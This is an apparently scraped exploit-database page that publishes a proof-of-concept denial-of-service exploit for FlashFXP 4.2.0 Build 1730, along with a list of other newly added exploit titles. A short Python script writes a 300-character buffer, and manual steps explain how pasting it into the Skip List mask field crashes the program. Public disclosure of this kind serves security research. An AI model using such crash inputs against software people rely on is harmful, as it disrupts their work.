
7 changes to exploits/shellcodes FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC) Redis - Replication Code Execution (Metasploit) IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit) DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit) SharePoint Workflows - XOML Injection (Metasploit) Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection
29 lines
No EOL
1,020 B
Python
Executable file
29 lines
No EOL
1,020 B
Python
Executable file
# Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)
|
|
# Vendor Homepage: https://www.flashfxp.com/
|
|
# Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/
|
|
# Exploit Author: Paras Bhatia
|
|
# Discovery Date: 2020-03-30
|
|
# Vulnerable Software: FlashFXP
|
|
# Version: 4.2.0 Build 1730
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on: Windows 10 Pro (64 bit)
|
|
|
|
#Steps to Produce the Crash:
|
|
|
|
# 1.- Run python code: FlashCrash.py
|
|
# 2.- Copy content to clipboard
|
|
# 3.- Open "FlashFXP.exe"
|
|
# 4.- Go to "Options" > Filters > Skip List > New Entry
|
|
# 5.- Paste ClipBoard into the "Mask" field
|
|
# 6.- Click on OK
|
|
# 7.- Go to "Options" > Filters > Skip List
|
|
# 8.- Crashed
|
|
|
|
#################################################################################################################################################
|
|
|
|
#Python "FlashCrash.py" Code:
|
|
|
|
buffer = "\x41" * 300
|
|
f = open ("FlashCrash.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |